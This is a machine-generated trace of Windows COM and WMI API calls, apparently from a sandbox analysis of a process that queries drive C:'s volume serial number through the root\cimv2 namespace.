[0191.406] WbemDefPath:IUnknown:Release (This=0x7ae450) returned 0x3 [0191.406] CoGetContextToken (in: pToken=0x71ee2b8 | out: pToken=0x71ee2b8) returned 0x0 [0191.406] CoGetContextToken (in: pToken=0x71ee6c0 | out: pToken=0x71ee6c0) returned 0x0 [0191.406] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee750 | out: ppvObject=0x71ee750*=0x0) returned 0x80004002 [0191.406] WbemDefPath:IUnknown:Release (This=0x6738a10) returned 0x2 [0191.406] WbemDefPath:IUnknown:Release (This=0x6738a10) returned 0x1 [0191.406] CoGetContextToken (in: pToken=0x71ef048 | out: pToken=0x71ef048) returned 0x0 [0191.406] CoGetContextToken (in: pToken=0x71eefa8 | out: pToken=0x71eefa8) returned 0x0 [0191.406] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x71ef078*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71ef074 | out: ppvObject=0x71ef074*=0x6738a10) returned 0x0 [0191.406] WbemDefPath:IUnknown:AddRef (This=0x6738a10) returned 0x3 [0191.406] WbemDefPath:IUnknown:Release (This=0x6738a10) returned 0x2 [0191.406] WbemDefPath:IWbemPath:SetText (This=0x6738a10, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0191.406] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a10, puCount=0x71ef1fc | out: puCount=0x71ef1fc*=0x0) returned 0x0 [0191.406] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x71ef1f8*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1f8*=0x20, pszText=0x0) returned 0x0 [0191.406] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x71ef1f8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1f8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0191.406] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738a10, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0191.406] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a10, puCount=0x71ef1fc | out: puCount=0x71ef1fc*=0x0) returned 0x0 [0191.407] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738a10, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0191.407] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738a10, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0191.407] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a10, puCount=0x71ef17c | out: puCount=0x71ef17c*=0x0) returned 0x0 [0191.407] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x71ef168 | out: puCount=0x71ef168*=0x2) returned 0x0 [0191.407] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef164*=0x0, pszText=0x0 | out: puBuffLength=0x71ef164*=0xf, pszText=0x0) returned 0x0 [0191.407] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef164*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef164*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0191.407] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef118 | out: ppv=0x71ef118*=0x72015c) returned 0x0 [0191.407] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef110 | out: pAptType=0x71ef110*=1) returned 0x0 [0191.407] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef114 | out: ppvObject=0x71ef114*=0x0) returned 0x80004002 [0191.407] IUnknown:Release (This=0x72015c) returned 0x1 [0191.408] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eea80 | out: ppv=0x71eea80*=0x6737108) returned 0x0 [0191.408] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737108, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eec98 | out: ppvObject=0x71eec98*=0x0) returned 0x80004002 [0191.409] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737108, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eecac | out: ppvObject=0x71eecac*=0x6738a80) returned 0x0 [0191.409] WbemDefPath:IUnknown:Release (This=0x6737108) returned 0x0 [0191.409] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee8cc | out: ppvObject=0x71ee8cc*=0x6738a80) returned 0x0 [0191.409] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee888 | out: ppvObject=0x71ee888*=0x0) returned 0x80004002 [0191.409] WbemDefPath:IUnknown:AddRef (This=0x6738a80) returned 0x3 [0191.409] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee1e4 | out: ppvObject=0x71ee1e4*=0x0) returned 0x80004002 [0191.409] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee194 | out: ppvObject=0x71ee194*=0x0) returned 0x80004002 [0191.409] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee1a0 | out: ppvObject=0x71ee1a0*=0x7ae6e0) returned 0x0 [0191.409] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae6e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee1a8 | out: pCid=0x71ee1a8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0191.409] WbemDefPath:IUnknown:Release (This=0x7ae6e0) returned 0x3 [0191.410] CoGetContextToken (in: pToken=0x71ee200 | out: pToken=0x71ee200) returned 0x0 [0191.410] CoGetContextToken (in: pToken=0x71ee608 | out: pToken=0x71ee608) returned 0x0 [0191.410] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee698 | out: ppvObject=0x71ee698*=0x0) returned 0x80004002 [0191.410] WbemDefPath:IUnknown:Release (This=0x6738a80) returned 0x2 [0191.410] WbemDefPath:IUnknown:Release (This=0x6738a80) returned 0x1 [0191.410] CoGetContextToken (in: pToken=0x71eef90 | out: pToken=0x71eef90) returned 0x0 [0191.410] CoGetContextToken (in: pToken=0x71eeef0 | out: pToken=0x71eeef0) returned 0x0 [0191.410] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x71eefc0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71eefbc | out: ppvObject=0x71eefbc*=0x6738a80) returned 0x0 [0191.410] WbemDefPath:IUnknown:AddRef (This=0x6738a80) returned 0x3 [0191.410] WbemDefPath:IUnknown:Release (This=0x6738a80) returned 0x2 [0191.410] WbemDefPath:IWbemPath:SetText (This=0x6738a80, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0191.410] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a80, puCount=0x71ef140 | out: puCount=0x71ef140*=0x2) returned 0x0 [0191.410] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=4, puBuffLength=0x71ef13c*=0x0, pszText=0x0 | out: puBuffLength=0x71ef13c*=0xf, pszText=0x0) returned 0x0 [0191.410] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=4, puBuffLength=0x71ef13c*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef13c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0191.410] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef140 | out: ppv=0x71ef140*=0x72015c) returned 0x0 [0191.411] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef138 | out: pAptType=0x71ef138*=1) returned 0x0 [0191.411] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef13c | out: ppvObject=0x71ef13c*=0x0) returned 0x80004002 [0191.411] IUnknown:Release (This=0x72015c) returned 0x1 [0191.411] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eed60 | out: ppv=0x71eed60*=0x672f250) returned 0x0 [0191.412] WbemLocator:IUnknown:QueryInterface (in: This=0x672f250, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eef78 | out: ppvObject=0x71eef78*=0x0) returned 0x80004002 [0191.412] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f250, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef8c | out: ppvObject=0x71eef8c*=0x6736e68) returned 0x0 [0191.412] WbemLocator:IUnknown:Release (This=0x672f250) returned 0x0 [0191.412] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eebac | out: ppvObject=0x71eebac*=0x6736e68) returned 0x0 [0191.412] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eeb68 | out: ppvObject=0x71eeb68*=0x0) returned 0x80004002 [0191.412] WbemLocator:IUnknown:AddRef (This=0x6736e68) returned 0x3 [0191.412] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee4c4 | out: ppvObject=0x71ee4c4*=0x0) returned 0x80004002 [0191.412] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee474 | out: ppvObject=0x71ee474*=0x0) returned 0x80004002 [0191.412] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee480 | out: ppvObject=0x71ee480*=0x0) returned 0x80004002 [0191.412] CoGetContextToken (in: pToken=0x71ee4e0 | out: pToken=0x71ee4e0) returned 0x0 [0191.412] CoGetContextToken (in: pToken=0x71ee8e8 | out: pToken=0x71ee8e8) returned 0x0 [0191.412] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee978 | out: ppvObject=0x71ee978*=0x0) returned 0x80004002 [0191.413] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x2 [0191.413] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x1 [0191.413] CoGetContextToken (in: pToken=0x71eef58 | out: pToken=0x71eef58) returned 0x0 [0191.413] CoGetContextToken (in: pToken=0x71eeeb8 | out: pToken=0x71eeeb8) returned 0x0 [0191.413] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x71eef88*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x71eef84 | out: ppvObject=0x71eef84*=0x6736e68) returned 0x0 [0191.413] WbemLocator:IUnknown:AddRef (This=0x6736e68) returned 0x3 [0191.413] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x2 [0191.413] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a80, puCount=0x71ef11c | out: puCount=0x71ef11c*=0x2) returned 0x0 [0191.413] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=8, puBuffLength=0x71ef118*=0x0, pszText=0x0 | out: puBuffLength=0x71ef118*=0xf, pszText=0x0) returned 0x0 [0191.413] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=8, puBuffLength=0x71ef118*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef118*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0191.413] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x71eeff4 | out: ppv=0x71eeff4*=0x6736e58) returned 0x0 [0191.413] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736e58, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x71ef088 | out: ppNamespace=0x71ef088*=0x674820c) returned 0x0 [0192.850] WbemLocator:IUnknown:QueryInterface (in: This=0x674820c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef24 | out: ppvObject=0x71eef24*=0x780be4) returned 0x0 [0192.850] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x780be4, pProxy=0x674820c, pAuthnSvc=0x71eef74, pAuthzSvc=0x71eef70, pServerPrincName=0x71eef68, pAuthnLevel=0x71eef6c, pImpLevel=0x71eef5c, pAuthInfo=0x71eef60, pCapabilites=0x71eef64 | out: pAuthnSvc=0x71eef74*=0xa, pAuthzSvc=0x71eef70*=0x0, pServerPrincName=0x71eef68, pAuthnLevel=0x71eef6c*=0x6, pImpLevel=0x71eef5c*=0x2, pAuthInfo=0x71eef60, pCapabilites=0x71eef64*=0x1) returned 0x0 [0192.850] WbemLocator:IUnknown:Release (This=0x780be4) returned 0x1 [0192.850] WbemLocator:IUnknown:QueryInterface (in: This=0x674820c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef18 | out: ppvObject=0x71eef18*=0x780c04) returned 0x0 [0192.851] WbemLocator:IUnknown:QueryInterface (in: This=0x674820c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef14 | out: ppvObject=0x71eef14*=0x780be4) returned 0x0 [0192.851] WbemLocator:IClientSecurity:SetBlanket (This=0x780be4, pProxy=0x674820c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0193.071] WbemLocator:IUnknown:Release (This=0x780be4) returned 0x2 [0193.071] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x1 [0193.071] CoTaskMemFree (pv=0x77e148) [0193.071] WbemLocator:IUnknown:Release (This=0x6736e58) returned 0x0 [0193.071] WbemLocator:IUnknown:QueryInterface (in: This=0x674820c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eeb14 | out: ppvObject=0x71eeb14*=0x780c04) returned 0x0 [0193.072] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eead0 | out: ppvObject=0x71eead0*=0x0) returned 0x80004002 [0193.304] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71ee8ec | out: ppvObject=0x71ee8ec*=0x0) returned 0x80004002 [0193.305] WbemLocator:IUnknown:AddRef (This=0x780c04) returned 0x3 [0193.305] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee42c | out: ppvObject=0x71ee42c*=0x0) returned 0x80004002 [0193.306] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee3dc | out: ppvObject=0x71ee3dc*=0x0) returned 0x80004002 [0193.306] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee3e8 | out: ppvObject=0x71ee3e8*=0x780b64) returned 0x0 [0193.306] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x780b64, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee3f0 | out: pCid=0x71ee3f0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0193.306] WbemLocator:IUnknown:Release (This=0x780b64) returned 0x3 [0193.306] CoGetContextToken (in: pToken=0x71ee448 | out: pToken=0x71ee448) returned 0x0 [0193.307] CoGetContextToken (in: pToken=0x71ee850 | out: pToken=0x71ee850) returned 0x0 [0193.307] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee8e0 | out: ppvObject=0x71ee8e0*=0x780bec) returned 0x0 [0193.307] WbemLocator:IRpcOptions:Query (in: This=0x780bec, pPrx=0x780c04, dwProperty=2, pdwValue=0x71ee908 | out: pdwValue=0x71ee908) returned 0x80004002 [0193.307] WbemLocator:IUnknown:Release (This=0x780bec) returned 0x3 [0193.307] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x2 [0193.307] CoGetContextToken (in: pToken=0x71eee28 | out: pToken=0x71eee28) returned 0x0 [0193.307] CoGetContextToken (in: pToken=0x71eed88 | out: pToken=0x71eed88) returned 0x0 [0193.307] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x71eee58*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x71eee54 | out: ppvObject=0x71eee54*=0x674820c) returned 0x0 [0193.307] WbemLocator:IUnknown:AddRef (This=0x674820c) returned 0x4 [0193.307] WbemLocator:IUnknown:Release (This=0x674820c) returned 0x3 [0193.307] WbemLocator:IUnknown:Release (This=0x674820c) returned 0x2 [0193.307] SysStringLen (param_1=0x0) returned 0x0 [0193.307] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a10, puCount=0x71ef1ec | out: puCount=0x71ef1ec*=0x0) returned 0x0 [0193.307] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x71ef1e8*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1e8*=0x20, pszText=0x0) returned 0x0 [0193.307] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x71ef1e8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1e8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0193.307] CoGetContextToken (in: pToken=0x71eee58 | out: pToken=0x71eee58) returned 0x0 [0193.308] WbemLocator:IUnknown:AddRef (This=0x780c04) returned 0x3 [0193.308] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eecec | out: ppvObject=0x71eecec*=0x780c04) returned 0x0 [0193.308] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x3 [0193.308] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x2 [0193.308] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x71ef1f0*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1f0*=0x20, pszText=0x0) returned 0x0 [0193.308] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x71ef1f0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1f0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0193.308] IWbemServices:GetObject (in: This=0x674820c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x71ef1a4*=0x0, ppCallResult=0x0 | out: ppObject=0x71ef1a4*=0x673bf90, ppCallResult=0x0) returned 0x0 [0193.550] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a80, puCount=0x71ef1a4 | out: puCount=0x71ef1a4*=0x2) returned 0x0 [0193.550] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=4, puBuffLength=0x71ef1a0*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1a0*=0xf, pszText=0x0) returned 0x0 [0193.550] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=4, puBuffLength=0x71ef1a0*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef1a0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0193.550] IWbemClassObject:Get (in: This=0x673bf90, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35713d0*=0, plFlavor=0x35713d4*=0 | out: pVal=0x71ef1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x35713d0*=8, plFlavor=0x35713d4*=0) returned 0x0 [0193.551] SysStringByteLen (bstr="9C354B42") returned 0x10 [0193.551] SysStringByteLen (bstr="9C354B42") returned 0x10 [0193.551] IWbemClassObject:Get (in: This=0x673bf90, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef1a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35713d0*=8, plFlavor=0x35713d4*=0 | out: pVal=0x71ef1a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x35713d0*=8, plFlavor=0x35713d4*=0) returned 0x0 [0193.551] SysStringByteLen 